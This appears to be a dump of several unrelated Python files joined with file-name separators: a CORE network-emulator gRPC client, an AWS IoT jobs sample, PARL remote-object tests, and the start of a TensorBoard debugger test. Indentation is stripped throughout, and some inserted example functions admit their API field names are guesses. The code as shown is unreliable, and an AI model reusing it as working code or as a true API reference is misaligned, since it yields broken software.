:return: nothing
"""
request = core_pb2.ThroughputsRequest()
stream = self.stub.Throughputs(request)
start_streamer(stream, handler)
def add_node(self, session_id, node):
"""
Add node to session.
:param int session_id: session id
:param core_pb2.Node node: node to add
:return: response with node id
:rtype: core_pb2.AddNodeResponse
:raises grpc.RpcError: when session doesn't exist
"""
request = core_pb2.AddNodeRequest(session_id=session_id, node=node)
return self.stub.AddNode(request)
def get_node(self, session_id, node_id):
"""
Get node details.
:param int session_id: session id
:param int node_id: node id
:return: response with node details
:rtype: core_pb2.GetNodeResponse
:raises grpc.RpcError: when session or node doesn't exist
"""
request = core_pb2.GetNodeRequest(session_id=session_id, node_id=node_id)
return self.stub.GetNode(request)
def edit_node(self, session_id, node_id, position):
"""
Edit a node, currently only changes position.
:param int session_id: session id
:param int node_id: node id
:param core_pb2.Position position: position to set node to
:return: response with result of success or failure
:rtype: core_pb2.EditNodeResponse
:raises grpc.RpcError: when session or node doesn't exist
"""
request = core_pb2.EditNodeRequest(session_id=session_id, node_id=node_id, position=position)
return self.stub.EditNode(request)
def delete_node(self, session_id, node_id):
"""
Delete node from session.
:param int session_id: session id
:param int node_id: node id
:return: response with result of success or failure
:rtype: core_pb2.DeleteNodeResponse
:raises grpc.RpcError: when session doesn't exist
"""
request = core_pb2.DeleteNodeRequest(session_id=session_id, node_id=node_id)
return self.stub.DeleteNode(request)
def node_command(self, session_id, node_id, command):
"""
Send command to a node and get the output.
:param int session_id: session id
:param int node_id: node id
:param str command: command to run on the node
:return: response with the command's combined stdout/stderr
:rtype: core_pb2.NodeCommandResponse
:raises grpc.RpcError: when session or node doesn't exist
"""
request = core_pb2.NodeCommandRequest(session_id=session_id, node_id=node_id, command=command)
return self.stub.NodeCommand(request)
def get_node_terminal(self, session_id, node_id):
"""
Retrieve terminal command string for launching a local terminal.
:param int session_id: session id
:param int node_id: node id
:return: response with a node terminal command
:rtype: core_pb2.GetNodeTerminalResponse
:raises grpc.RpcError: when session or node doesn't exist
"""
request = core_pb2.GetNodeTerminalRequest(session_id=session_id, node_id=node_id)
return self.stub.GetNodeTerminal(request)
def get_node_links(self, session_id, node_id):
"""
Get current links for a node.
:param int session_id: session id
:param int node_id: node id
:return: response with a list of links
:rtype: core_pb2.GetNodeLinksResponse
:raises grpc.RpcError: when session or node doesn't exist
"""
request = core_pb2.GetNodeLinksRequest(session_id=session_id, node_id=node_id)
return self.stub.GetNodeLinks(request)
def add_link(self, session_id, node_one_id, node_two_id, interface_one=None, interface_two=None, options=None):
"""
Add a link between nodes.
:param int session_id: session id
:param int node_one_id: node one id
:param int node_two_id: node two id
:param core_pb2.Interface interface_one: node one interface data
:param core_pb2.Interface interface_two: node two interface data
:param core_pb2.LinkOptions options: options for link (jitter, bandwidth, etc)
:return: response with result of success or failure
:rtype: core_pb2.AddLinkResponse
:raises grpc.RpcError: when session or one of the nodes don't exist
"""
link = core_pb2.Link(
node_one_id=node_one_id, node_two_id=node_two_id, type=core_pb2.LinkType.WIRED,
interface_one=interface_one, interface_two=interface_two, options=options)
request = core_pb2.AddLinkRequest(session_id=session_id, link=link)
return self.stub.AddLink(request)
def edit_link(self, session_id, node_one_id, node_two_id, options, interface_one_id=None, interface_two_id=None):
"""
Edit a link between nodes.
:param int session_id: session id
:param int node_one_id: node one id
:param int node_two_id: node two id
:param core_pb2.LinkOptions options: options for link (jitter, bandwidth, etc)
:param int interface_one_id: node one interface id
:param int interface_two_id: node two interface id
:return: response with result of success or failure
:rtype: core_pb2.EditLinkResponse
:raises grpc.RpcError: when session or one of the nodes don't exist
"""
request = core_pb2.EditLinkRequest(
session_id=session_id, node_one_id=node_one_id, node_two_id=node_two_id, options=options,
interface_one_id=interface_one_id, interface_two_id=interface_two_id)
return self.stub.EditLink(request)
def delete_link(self, session_id, node_one_id, node_two_id, interface_one_id=None, interface_two_id=None):
"""
Delete a link between nodes.
:param int session_id: session id
:param int node_one_id: node one id
:param int node_two_id: node two id
:param int interface_one_id: node one interface id
:param int interface_two_id: node two interface id
:return: response with result of success or failure
:rtype: core_pb2.DeleteLinkResponse
:raises grpc.RpcError: when session doesn't exist
"""
request = core_pb2.DeleteLinkRequest(
session_id=session_id, node_one_id=node_one_id, node_two_id=node_two_id,
interface_one_id=interface_one_id, interface_two_id=interface_two_id)
return self.stub.DeleteLink(request)
def get_hooks(self, session_id):
"""
Get all hook scripts.
:param int session_id: session id
:return: response with a list of hooks
:rtype: core_pb2.GetHooksResponse
:raises grpc.RpcError: when session doesn't exist
"""
request = core_pb2.GetHooksRequest(session_id=session_id)
return self.stub.GetHooks(request)
def add_hook(self, session_id, state, file_name, file_data):
"""
Add hook scripts.
:param int session_id: session id
:param core_pb2.SessionState state: state to trigger hook
:param str file_name: name of file for hook script
:param bytes file_data: hook script contents
:return: response with result of success or failure
:rtype: core_pb2.AddHookResponse
:raises grpc.RpcError: when session doesn't exist
"""
hook = core_pb2.Hook(state=state, file=file_name, data=file_data)
request = core_pb2.AddHookRequest(session_id=session_id, hook=hook)
return self.stub.AddHook(request)
def get_mobility_configs(self, session_id):
"""
Get all mobility configurations.
:param int session_id: session id
:return: response with a dict of node ids to mobility configurations
:rtype: core_pb2.GetMobilityConfigsResponse
:raises grpc.RpcError: when session doesn't exist
"""
request = core_pb2.GetMobilityConfigsRequest(session_id=session_id)
return self.stub.GetMobilityConfigs(request)
def get_mobility_config(self, session_id, node_id):
"""
Get mobility configuration for a node.
:param int session_id: session id
:param int node_id: node id
:return: response with a list of configuration groups
:rtype: core_pb2.GetMobilityConfigResponse
:raises grpc.RpcError: when session or node doesn't exist
"""
request = core_pb2.GetMobilityConfigRequest(session_id=session_id, node_id=node_id)
return self.stub.GetMobilityConfig(request)
def set_mobility_config(self, session_id, node_id, config):
"""
Set mobility configuration for a node.
:param int session_id: session id
:param int node_id: node id
:param dict[str, str] config: mobility configuration
:return: response with result of success or failure
:rtype: core_pb2.SetMobilityConfigResponse
:raises grpc.RpcError: when session or node doesn't exist
"""
request = core_pb2.SetMobilityConfigRequest(session_id=session_id, node_id=node_id, config=config)
return self.stub.SetMobilityConfig(request)
def mobility_action(self, session_id, node_id, action):
"""
Send a mobility action for a node.
:param int session_id: session id
:param int node_id: node id
:param core_pb2.ServiceAction action: action to take
:return: response with result of success or failure
:rtype: core_pb2.MobilityActionResponse
:raises grpc.RpcError: when session or node doesn't exist
"""
request = core_pb2.MobilityActionRequest(session_id=session_id, node_id=node_id, action=action)
return self.stub.MobilityAction(request)
def get_services(self):
"""
Get all currently loaded services.
:return: response with a list of services
:rtype: core_pb2.GetServicesResponse
"""
request = core_pb2.GetServicesRequest()
return self.stub.GetServices(request)
def get_service_defaults(self, session_id):
"""
Get default services for different default node models.
:param int session_id: session id
:return: response with a dict of node model to a list of services
:rtype: core_pb2.GetServiceDefaultsResponse
:raises grpc.RpcError: when session doesn't exist
"""
request = core_pb2.GetServiceDefaultsRequest(session_id=session_id)
return self.stub.GetServiceDefaults(request)
def set_service_defaults(self, session_id, service_defaults):
"""
Set default services for node models.
:param int session_id: session id
:param dict service_defaults: node models to lists of services
:return: response with result of success or failure
:rtype: core_pb2.SetServiceDefaultsResponse
:raises grpc.RpcError: when session doesn't exist
"""
defaults = []
for node_type in service_defaults:
services = service_defaults[node_type]
default = core_pb2.ServiceDefaults(node_type=node_type, services=services)
defaults.append(default)
request = core_pb2.SetServiceDefaultsRequest(session_id=session_id, defaults=defaults)
return self.stub.SetServiceDefaults(request)
def get_node_service(self, session_id, node_id, service):
"""
Get service data for a node.
:param int session_id: session id
:param int node_id: node id
:param str service: service name
:return: response with node service data
:rtype: core_pb2.GetNodeServiceResponse
:raises grpc.RpcError: when session or node doesn't exist
"""
request = core_pb2.GetNodeServiceRequest(session_id=session_id, node_id=node_id, service=service)
return self.stub.GetNodeService(request)
def get_node_service_file(self, session_id, node_id, service, file_name):
"""
Get a service file for a node.
:param int session_id: session id
:param int node_id: node id
:param str service: service name
:param str file_name: file name to get data for
:return: response with file data
:rtype: core_pb2.GetNodeServiceFileResponse
:raises grpc.RpcError: when session or node doesn't exist
"""
request = core_pb2.GetNodeServiceFileRequest(
session_id=session_id, node_id=node_id, service=service, file=file_name)
return self.stub.GetNodeServiceFile(request)
def set_node_service(self, session_id, node_id, service, startup, validate, shutdown):
"""
Set service data for a node.
:param int session_id: session id
:param int node_id: node id
:param str service: service name
:param list startup: startup commands
:param list validate: validation commands
:param list shutdown: shutdown commands
:return: response with result of success or failure
:rtype: core_pb2.SetNodeServiceResponse
:raises grpc.RpcError: when session or node doesn't exist
"""
request = core_pb2.SetNodeServiceRequest(
session_id=session_id, node_id=node_id, service=service, startup=startup, validate=validate,
shutdown=shutdown)
return self.stub.SetNodeService(request)
def set_node_service_file(self, session_id, node_id, service, file_name, data):
"""
Set a service file for a node.
:param int session_id: session id
:param int node_id: node id
:param str service: service name
:param str file_name: file name to save
:param bytes data: data to save for file
:return: response with result of success or failure
:rtype: core_pb2.SetNodeServiceFileResponse
:raises grpc.RpcError: when session or node doesn't exist
"""
request = core_pb2.SetNodeServiceFileRequest(
session_id=session_id, node_id=node_id, service=service, file=file_name, data=data)
return self.stub.SetNodeServiceFile(request)
def service_action(self, session_id, node_id, service, action):
"""
Send an action to a service for a node.
:param int session_id: session id
:param int node_id: node id
:param str service: service name
:param core_pb2.ServiceAction action: action for service (start, stop, restart, validate)
:return: response with result of success or failure
:rtype: core_pb2.ServiceActionResponse
:raises grpc.RpcError: when session or node doesn't exist
"""
request = core_pb2.ServiceActionRequest(session_id=session_id, node_id=node_id, service=service, action=action)
return self.stub.ServiceAction(request)
def get_wlan_config(self, session_id, node_id):
"""
Get wlan configuration for a node.
:param int session_id: session id
:param int node_id: node id
:return: response with a list of configuration groups
:rtype: core_pb2.GetWlanConfigResponse
:raises grpc.RpcError: when session doesn't exist
"""
request = core_pb2.GetWlanConfigRequest(session_id=session_id, node_id=node_id)
return self.stub.GetWlanConfig(request)
def set_wlan_config(self, session_id, node_id, config):
"""
Set wlan configuration for a node.
:param int session_id: session id
:param int node_id: node id
:param dict[str, str] config: wlan configuration
:return: response with result of success or failure
:rtype: core_pb2.SetWlanConfigResponse
:raises grpc.RpcError: when session doesn't exist
"""
request = core_pb2.SetWlanConfigRequest(session_id=session_id, node_id=node_id, config=config)
return self.stub.SetWlanConfig(request)
def get_emane_config(self, session_id):
"""
Get session emane configuration.
:param int session_id: session id
:return: response with a list of configuration groups
:rtype: core_pb2.GetEmaneConfigResponse
:raises grpc.RpcError: when session doesn't exist
"""
request = core_pb2.GetEmaneConfigRequest(session_id=session_id)
return self.stub.GetEmaneConfig(request)
def set_emane_config(self, session_id, config):
"""
Set session emane configuration.
:param int session_id: session id
:param dict[str, str] config: emane configuration
:return: response with result of success or failure
:rtype: core_pb2.SetEmaneConfigResponse
:raises grpc.RpcError: when session doesn't exist
"""
request = core_pb2.SetEmaneConfigRequest(session_id=session_id, config=config)
return self.stub.SetEmaneConfig(request)
def get_emane_models(self, session_id):
"""
Get session emane models.
:param int session_id: session id
:return: response with a list of emane models
:rtype: core_pb2.GetEmaneModelsResponse
:raises grpc.RpcError: when session doesn't exist
"""
request = core_pb2.GetEmaneModelsRequest(session_id=session_id)
return self.stub.GetEmaneModels(request)
def get_emane_model_config(self, session_id, node_id, model, interface_id=-1):
"""
Get emane model configuration for a node or a node's interface.
:param int session_id: session id
:param int node_id: node id
:param str model: emane model name
:param int interface_id: node interface id
:return: response with a list of configuration groups
:rtype: core_pb2.GetEmaneModelConfigResponse
:raises grpc.RpcError: when session doesn't exist
"""
request = core_pb2.GetEmaneModelConfigRequest(
session_id=session_id, node_id=node_id, model=model, interface=interface_id)
return self.stub.GetEmaneModelConfig(request)
def set_emane_model_config(self, session_id, node_id, model, config, interface_id=-1):
"""
Set emane model configuration for a node or a node's interface.
:param int session_id: session id
:param int node_id: node id
:param str model: emane model name
:param dict[str, str] config: emane model configuration
:param int interface_id: node interface id
:return: response with result of success or failure
:rtype: core_pb2.SetEmaneModelConfigResponse
:raises grpc.RpcError: when session doesn't exist
"""
request = core_pb2.SetEmaneModelConfigRequest(
session_id=session_id, node_id=node_id, model=model, config=config, interface_id=interface_id)
return self.stub.SetEmaneModelConfig(request)
def get_emane_model_configs(self, session_id):
"""
Get all emane model configurations for a session.
:param int session_id: session id
:return: response with a dictionary of node/interface ids to configurations
:rtype: core_pb2.GetEmaneModelConfigsResponse
:raises grpc.RpcError: when session doesn't exist
"""
request = core_pb2.GetEmaneModelConfigsRequest(session_id=session_id)
return self.stub.GetEmaneModelConfigs(request)
def save_xml(self, session_id, file_path):
"""
Save the current scenario to an XML file.
:param int session_id: session id
:param str file_path: local path to save scenario XML file to
:return: nothing
"""
request = core_pb2.SaveXmlRequest(session_id=session_id)
response = self.stub.SaveXml(request)
with open(file_path, "w") as xml_file:
xml_file.write(response.data)
def open_xml(self, file_path):
"""
Load a local scenario XML file to open as a new session.
:param str file_path: path of scenario XML file
:return: response with opened session id
:rtype: core_pb2.OpenXmlResponse
"""
with open(file_path, "r") as xml_file:
data = xml_file.read()
request = core_pb2.OpenXmlRequest(data=data)
return self.stub.OpenXml(request)
def connect(self):
"""
Open connection to server, must be closed manually.
:return: nothing
"""
self.channel = grpc.insecure_channel(self.address)
self.stub = core_pb2_grpc.CoreApiStub(self.channel)
def close(self):
"""
Close currently opened server channel connection.
:return: nothing
"""
if self.channel:
self.channel.close()
self.channel = None
@contextmanager
def context_connect(self):
"""
Makes a context manager based connection to the server, will close after context ends.
:return: nothing
"""
try:
self.connect()
yield
finally:
self.close()
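# Illustrative end-to-end sketch (assumption, not part of the original module):
# create a session, add two nodes, and link them. The core_pb2 field and response
# attribute names used here (session_id, node_id, position, x, y) are inferred from
# the docstrings above and may differ from the actual protobuf definitions.
def _example_two_node_session(address="localhost:50051"):
    """Minimal sketch of driving CORE over gRPC with CoreGrpcClient."""
    client = CoreGrpcClient(address)
    helper = InterfaceHelper(ip4_prefix="10.83.0.0/16")
    with client.context_connect():
        session_id = client.create_session().session_id
        # two basic nodes at example positions
        node_one = core_pb2.Node(position=core_pb2.Position(x=100, y=100))
        node_two = core_pb2.Node(position=core_pb2.Position(x=300, y=100))
        node_one_id = client.add_node(session_id, node_one).node_id
        node_two_id = client.add_node(session_id, node_two).node_id
        # wire them together using generated interface data
        iface_one = helper.create_interface(node_one_id, 0)
        iface_two = helper.create_interface(node_two_id, 0)
        client.add_link(session_id, node_one_id, node_two_id, iface_one, iface_two)
        return session_id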
|
jobsSample.py
|
'''
/*
* Copyright 2010-2018 Amazon.com, Inc. or its affiliates. All Rights Reserved.
*
* Licensed under the Apache License, Version 2.0 (the "License").
* You may not use this file except in compliance with the License.
* A copy of the License is located at
*
* http://aws.amazon.com/apache2.0
*
* or in the "license" file accompanying this file. This file is distributed
* on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either
* express or implied. See the License for the specific language governing
* permissions and limitations under the License.
*/
'''
from AWSIoTPythonSDK.MQTTLib import AWSIoTMQTTClient
from AWSIoTPythonSDK.MQTTLib import AWSIoTMQTTThingJobsClient
from AWSIoTPythonSDK.core.jobs.thingJobManager import jobExecutionTopicType
from AWSIoTPythonSDK.core.jobs.thingJobManager import jobExecutionTopicReplyType
from AWSIoTPythonSDK.core.jobs.thingJobManager import jobExecutionStatus
import threading
import logging
import time
import datetime
import argparse
import json
class JobsMessageProcessor(object):
def __init__(self, awsIoTMQTTThingJobsClient, clientToken):
#keep track of this to correlate request/responses
self.clientToken = clientToken
self.awsIoTMQTTThingJobsClient = awsIoTMQTTThingJobsClient
self.done = False
self.jobsStarted = 0
self.jobsSucceeded = 0
self.jobsRejected = 0
self._setupCallbacks(self.awsIoTMQTTThingJobsClient)
def _setupCallbacks(self, awsIoTMQTTThingJobsClient):
self.awsIoTMQTTThingJobsClient.createJobSubscription(self.newJobReceived, jobExecutionTopicType.JOB_NOTIFY_NEXT_TOPIC)
self.awsIoTMQTTThingJobsClient.createJobSubscription(self.startNextJobSuccessfullyInProgress, jobExecutionTopicType.JOB_START_NEXT_TOPIC, jobExecutionTopicReplyType.JOB_ACCEPTED_REPLY_TYPE)
self.awsIoTMQTTThingJobsClient.createJobSubscription(self.startNextRejected, jobExecutionTopicType.JOB_START_NEXT_TOPIC, jobExecutionTopicReplyType.JOB_REJECTED_REPLY_TYPE)
# '+' indicates a wildcard for jobId in the following subscriptions
self.awsIoTMQTTThingJobsClient.createJobSubscription(self.updateJobSuccessful, jobExecutionTopicType.JOB_UPDATE_TOPIC, jobExecutionTopicReplyType.JOB_ACCEPTED_REPLY_TYPE, '+')
self.awsIoTMQTTThingJobsClient.createJobSubscription(self.updateJobRejected, jobExecutionTopicType.JOB_UPDATE_TOPIC, jobExecutionTopicReplyType.JOB_REJECTED_REPLY_TYPE, '+')
#callback when a start-next request is accepted and a job execution moves to IN_PROGRESS
def startNextJobSuccessfullyInProgress(self, client, userdata, message):
payload = json.loads(message.payload.decode('utf-8'))
if 'execution' in payload:
self.jobsStarted += 1
execution = payload['execution']
self.executeJob(execution)
statusDetails = {'HandledBy': 'ClientToken: {}'.format(self.clientToken)}
threading.Thread(target = self.awsIoTMQTTThingJobsClient.sendJobsUpdate, kwargs = {'jobId': execution['jobId'], 'status': jobExecutionStatus.JOB_EXECUTION_SUCCEEDED, 'statusDetails': statusDetails, 'expectedVersion': execution['versionNumber'], 'executionNumber': execution['executionNumber']}).start()
else:
print('Start next saw no execution: ' + message.payload.decode('utf-8'))
self.done = True
def executeJob(self, execution):
print('Executing job ID, version, number: {}, {}, {}'.format(execution['jobId'], execution['versionNumber'], execution['executionNumber']))
print('With jobDocument: ' + json.dumps(execution['jobDocument']))
def newJobReceived(self, client, userdata, message):
payload = json.loads(message.payload.decode('utf-8'))
if 'execution' in payload:
self._attemptStartNextJob()
else:
print('Notify next saw no execution')
self.done = True
def processJobs(self):
self.done = False
self._attemptStartNextJob()
def startNextRejected(self, client, userdata, message):
print('Start next rejected:' + message.payload.decode('utf-8'))
self.jobsRejected += 1
def updateJobSuccessful(self, client, userdata, message):
self.jobsSucceeded += 1
def updateJobRejected(self, client, userdata, message):
self.jobsRejected += 1
def _attemptStartNextJob(self):
statusDetails = {'StartedBy': 'ClientToken: {} on {}'.format(self.clientToken, datetime.datetime.now().isoformat())}
threading.Thread(target=self.awsIoTMQTTThingJobsClient.sendJobsStartNext, kwargs = {'statusDetails': statusDetails}).start()
def isDone(self):
return self.done
def getStats(self):
stats = {}
stats['jobsStarted'] = self.jobsStarted
stats['jobsSucceeded'] = self.jobsSucceeded
stats['jobsRejected'] = self.jobsRejected
return stats
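# Illustrative example (assumption, not from the original sample): the rough shape of
# the 'execution' object handled by startNextJobSuccessfullyInProgress()/executeJob().
# Values are made up; the keys mirror those accessed in the callbacks above.
_EXAMPLE_JOB_EXECUTION = {
    'jobId': 'example-job-001',
    'status': 'QUEUED',
    'versionNumber': 1,
    'executionNumber': 1,
    'jobDocument': {'operation': 'example', 'otherParams': {}},
}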
# Read in command-line parameters
parser = argparse.ArgumentParser()
parser.add_argument("-n", "--thingName", action="store", dest="thingName", help="Your AWS IoT ThingName to process jobs for")
parser.add_argument("-e", "--endpoint", action="store", required=True, dest="host", help="Your AWS IoT custom endpoint")
parser.add_argument("-r", "--rootCA", action="store", required=True, dest="rootCAPath", help="Root CA file path")
parser.add_argument("-c", "--cert", action="store", dest="certificatePath", help="Certificate file path")
parser.add_argument("-k", "--key", action="store", dest="privateKeyPath", help="Private key file path")
parser.add_argument("-p", "--port", action="store", dest="port", type=int, help="Port number override")
parser.add_argument("-w", "--websocket", action="store_true", dest="useWebsocket", default=False,
help="Use MQTT over WebSocket")
parser.add_argument("-id", "--clientId", action="store", dest="clientId", default="basicJobsSampleClient",
help="Targeted client id")
args = parser.parse_args()
host = args.host
rootCAPath = args.rootCAPath
certificatePath = args.certificatePath
privateKeyPath = args.privateKeyPath
port = args.port
useWebsocket = args.useWebsocket
clientId = args.clientId
thingName = args.thingName
if args.useWebsocket and args.certificatePath and args.privateKeyPath:
parser.error("X.509 cert authentication and WebSocket are mutual exclusive. Please pick one.")
exit(2)
if not args.useWebsocket and (not args.certificatePath or not args.privateKeyPath):
parser.error("Missing credentials for authentication.")
exit(2)
# Port defaults
if args.useWebsocket and not args.port: # When no port override for WebSocket, default to 443
port = 443
if not args.useWebsocket and not args.port: # When no port override for non-WebSocket, default to 8883
port = 8883
# Configure logging
logger = logging.getLogger("AWSIoTPythonSDK.core")
logger.setLevel(logging.DEBUG)
streamHandler = logging.StreamHandler()
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
streamHandler.setFormatter(formatter)
logger.addHandler(streamHandler)
# Init AWSIoTMQTTClient
myAWSIoTMQTTClient = None
if useWebsocket:
myAWSIoTMQTTClient = AWSIoTMQTTClient(clientId, useWebsocket=True)
myAWSIoTMQTTClient.configureEndpoint(host, port)
myAWSIoTMQTTClient.configureCredentials(rootCAPath)
else:
myAWSIoTMQTTClient = AWSIoTMQTTClient(clientId)
myAWSIoTMQTTClient.configureEndpoint(host, port)
myAWSIoTMQTTClient.configureCredentials(rootCAPath, privateKeyPath, certificatePath)
# AWSIoTMQTTClient connection configuration
myAWSIoTMQTTClient.configureAutoReconnectBackoffTime(1, 32, 20)
myAWSIoTMQTTClient.configureConnectDisconnectTimeout(10) # 10 sec
myAWSIoTMQTTClient.configureMQTTOperationTimeout(10) # 10 sec
jobsClient = AWSIoTMQTTThingJobsClient(clientId, thingName, QoS=1, awsIoTMQTTClient=myAWSIoTMQTTClient)
print('Connecting to MQTT server and setting up callbacks...')
jobsClient.connect()
jobsMsgProc = JobsMessageProcessor(jobsClient, clientId)
print('Starting to process jobs...')
jobsMsgProc.processJobs()
while not jobsMsgProc.isDone():
time.sleep(2)
print('Done processing jobs')
print('Stats: ' + json.dumps(jobsMsgProc.getStats()))
jobsClient.disconnect()
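# Example invocation (illustrative; the endpoint, file paths and thing name below are
# placeholders, not values shipped with this sample):
#   python jobsSample.py -e <prefix>-ats.iot.<region>.amazonaws.com \
#       -r root-CA.crt -c device.pem.crt -k private.pem.key -n MyThingName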
|
remote_test.py
|
# Copyright (c) 2018 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import inspect
import parl
import threading
import time
import unittest
from parl.remote import *
class UnableSerializeObject(object):
def __init__(self):
# threading.Lock() can not be serialized
self.lock = threading.Lock()
@parl.remote_class
class Simulator:
def __init__(self, arg1, arg2=None):
self.arg1 = arg1
self.arg2 = arg2
def get_arg1(self):
return self.arg1
def get_arg2(self):
return self.arg2
def set_arg1(self, value):
self.arg1 = value
def set_arg2(self, value):
self.arg2 = value
def get_unable_serialize_object(self):
return UnableSerializeObject()
def add_one(self, value):
value += 1
return value
def will_raise_exception_func(self):
x = 1 / 0
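# Illustrative sketch (assumption, mirroring the wiring used by the tests below): a
# decorated Simulator serves itself via as_remote() in a background thread, while a
# RemoteManager on the same (made-up) port hands back a proxy whose method calls are
# executed on the remote side.
def _example_remote_wiring(server_port=17799):
    """Start one Simulator as a remote client and call it through a proxy."""
    sim = Simulator(1, arg2=2)
    client_thread = threading.Thread(
        target=sim.as_remote, args=('localhost', server_port))
    client_thread.setDaemon(True)
    client_thread.start()
    manager = RemoteManager(port=server_port)
    remote_sim = manager.get_remote()
    return remote_sim.add_one(1)  # executed remotely; expected to return 2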
class TestRemote(unittest.TestCase):
def _setUp(self, server_port):
self.sim = Simulator(1, arg2=2)
# run client in a new thread to fake a remote client
self.client_thread = threading.Thread(
target=self.sim.as_remote, args=(
'localhost',
server_port,
))
self.client_thread.setDaemon(True)
self.client_thread.start()
self.remote_manager = RemoteManager(port=server_port)
def test_remote_object(self):
server_port = 17770
self._setUp(server_port)
remote_sim = self.remote_manager.get_remote()
self.assertEqual(remote_sim.get_arg1(), 1)
self.assertEqual(remote_sim.get_arg2(), 2)
ret = remote_sim.set_arg1(3)
self.assertIsNone(ret)
ret = remote_sim.set_arg2(4)
self.assertIsNone(ret)
self.assertEqual(remote_sim.get_arg1(), 3)
self.assertEqual(remote_sim.get_arg2(), 4)
def test_remote_object_with_wrong_getattr_get_variable(self):
server_port = 17771
self._setUp(server_port)
remote_sim = self.remote_manager.get_remote()
try:
remote_sim.get_arg3()
except RemoteAttributeError as e:
logger.info('Expected exception: {}'.format(e))
# expected
return
assert False
def test_remote_object_with_wrong_getattr_set_variable(self):
server_port = 17772
self._setUp(server_port)
remote_sim = self.remote_manager.get_remote()
try:
remote_sim.set_arg3(3)
except RemoteAttributeError as e:
logger.info('Expected exception: {}'.format(e))
# expected
return
assert False
def test_remote_object_with_wrong_argument(self):
server_port = 17773
self._setUp(server_port)
remote_sim = self.remote_manager.get_remote()
try:
remote_sim.set_arg1(wrong_arg=1)
except RemoteError as e:
logger.info('Expected exception: {}'.format(e))
# expected
return
assert False
def test_remote_object_with_unable_serialize_argument(self):
server_port = 17774
self._setUp(server_port)
remote_sim = self.remote_manager.get_remote()
try:
remote_sim.set_arg1(UnableSerializeObject())
except SerializeError as e:
logger.info('Expected exception: {}'.format(e))
# expected
return
assert False
def test_remote_object_with_unable_serialize_return(self):
server_port = 17775
self._setUp(server_port)
remote_sim = self.remote_manager.get_remote()
try:
remote_sim.get_unable_serialize_object()
except RemoteSerializeError as e:
# expected
logger.info('Expected exception: {}'.format(e))
return
assert False
def test_multi_remote_object(self):
server_port = 17776
self._setUp(server_port)
time.sleep(1)
# run second client
sim2 = Simulator(11, arg2=22)
client_thread2 = threading.Thread(
target=sim2.as_remote, args=(
'localhost',
server_port,
))
client_thread2.setDaemon(True)
client_thread2.start()
time.sleep(1)
remote_sim1 = self.remote_manager.get_remote()
remote_sim2 = self.remote_manager.get_remote()
self.assertEqual(remote_sim1.get_arg1(), 1)
self.assertEqual(remote_sim2.get_arg1(), 11)
def test_multi_remote_object_with_one_failed(self):
server_port = 17777
self._setUp(server_port)
time.sleep(1)
# run second client
sim2 = Simulator(11, arg2=22)
client_thread2 = threading.Thread(
target=sim2.as_remote, args=(
'localhost',
server_port,
))
client_thread2.setDaemon(True)
client_thread2.start()
time.sleep(1)
remote_sim1 = self.remote_manager.get_remote()
remote_sim2 = self.remote_manager.get_remote()
try:
# make remote sim1 failed
remote_sim1.get_arg3()
except:
pass
self.assertEqual(remote_sim2.get_arg1(), 11)
# Todo(@zenghongsheng):
# zmq will raise unexpected C++ exception when closing context,
# remove this unittest for now.
#def test_heartbeat_after_server_closed(self):
# server_port = 17778
# self._setUp(server_port)
# remote_sim = self.remote_manager.get_remote()
# time.sleep(1)
# self.remote_manager.close()
# # heartbeat interval (10s) + max waiting reply (10s)
# time.sleep(20)
# logger.info('check self.sim.remote_closed')
# self.assertTrue(self.sim.remote_closed())
def test_set_client_ip_port_manually(self):
server_port = 17779
self._setUp(server_port)
time.sleep(1)
# run second client
sim2 = Simulator(11, arg2=22)
client_thread2 = threading.Thread(
target=sim2.as_remote,
args=(
'localhost',
server_port,
'localhost',
6666,
))
client_thread2.setDaemon(True)
client_thread2.start()
time.sleep(1)
remote_sim1 = self.remote_manager.get_remote()
remote_sim2 = self.remote_manager.get_remote()
self.assertEqual(remote_sim1.get_arg1(), 1)
self.assertEqual(remote_sim2.get_arg1(), 11)
def test_thread_safe_of_remote_module(self):
server_port = 17780
self._setUp(server_port)
time.sleep(1)
thread_num = 10
for _ in range(thread_num):
# run clients in backend
sim = Simulator(11, arg2=22)
client_thread = threading.Thread(
target=sim.as_remote, args=(
'localhost',
server_port,
))
client_thread.setDaemon(True)
client_thread.start()
time.sleep(1)
threads = []
for _ in range(thread_num):
remote_sim = self.remote_manager.get_remote()
t = threading.Thread(
target=self._run_remote_add, args=(remote_sim, ))
t.start()
threads.append(t)
for t in threads:
t.join()
def test_remote_object_with_call_raise_exception_function(self):
server_port = 17781
self._setUp(server_port)
remote_sim = self.remote_manager.get_remote()
try:
remote_sim.will_raise_exception_func()
except RemoteError as e:
assert 'Traceback (most recent call last)' in str(e)
logger.info('Expected exception: {}'.format(e))
# expected
return
assert False
def _run_remote_add(self, remote_sim):
value = 0
for i in range(1000):
value = remote_sim.add_one(value)
assert value == i + 1
if __name__ == '__main__':
unittest.main()
|
interactive_debugger_plugin_test.py
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests end-to-end debugger interactive data server behavior.
This test launches an instance of InteractiveDebuggerPlugin as a separate thread.
The test then calls Session.run() using RunOptions pointing to the grpc:// debug
URL of the debugger data server. It then sends HTTP requests to the TensorBoard
backend endpoints to query and control the state of the Session.run().
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import json
import shutil
import tempfile
import threading
import numpy as np
import portpicker # pylint: disable=import-error
from six.moves import urllib # pylint: disable=wrong-import-order
import tensorflow as tf # pylint: disable=wrong-import-order
from tensorflow.python import debug as tf_debug # pylint: disable=wrong-import-order
from werkzeug import test as werkzeug_test # pylint: disable=wrong-import-order
